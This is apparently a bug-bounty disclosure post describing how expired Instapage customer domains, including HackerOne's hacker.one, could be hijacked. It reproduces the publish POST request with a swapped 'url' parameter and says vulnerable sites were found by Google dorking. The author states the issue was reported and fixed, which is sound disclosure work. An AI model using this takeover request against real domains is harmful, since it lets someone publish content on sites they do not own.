Hijacking tons of Instapage expired users Domains & Subdomains

Hello all 🙂

so this post is about how I was able to hijack ton’s of domains/subdomains who using Instapage if there service got expired.

What is instapage ?

Instapage is a service that lets you build landing pages for your online marketing and promotion campaigns with ease. It offers features such as A/B Testing, multiple campaign management, easy page building, and a lot more!

it also allows users to map its template on there own domain or subdomains.

How i found it ?

as am one of researchers from HackerOne platform , I was trying to get something on HackerOne itself as I want that Hacking Hackers Badge of my profile.

I found hacker.one is inscope domain list which is one of the officail website of HackerOne, and when I vistied it and seen some error which caught in my eye and after figuring it, I come to know it was Instapage error which occurs when service get expired or domain or subdoamin not linked properly and it takes just few mintues to figurte it out that I can publish my own template to any of misconfigured and expired domains/subdomains of instapage and luckly HackerOne is one of there users.

Instapage error on Hacker.One :

bxwvtem

 

Vulnerable Post Request :

POST /ajax/builder2/publish/2340488 HTTP/1.1
Host: app.instapage.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://app.instapage.com/builder2?id=2340488
Content-Length: 31
Cookie: cookie_value
Connection: close

version=1&url=www.hacker.one

where url parameter value contain vulnerable domains .

Hacker.One domain Takeover : 

insta-0day

 

Here is the Video POC :

and with help of Google dork and error of instapage I found tons of websites are Vulnerable for this and anyone can takeover it with own content on it, I contacted Instapage via HackerOne.

HackerOne fixed it next of report by removing the cname entry pointing to instapage and later Instapage fixed in completely and got confirmation of fix via HackerOne report thread.

Thanks to HackerOne to being a mediator for contacting Instapage and fixing the things in correct way.

HackerOne report thread : #159156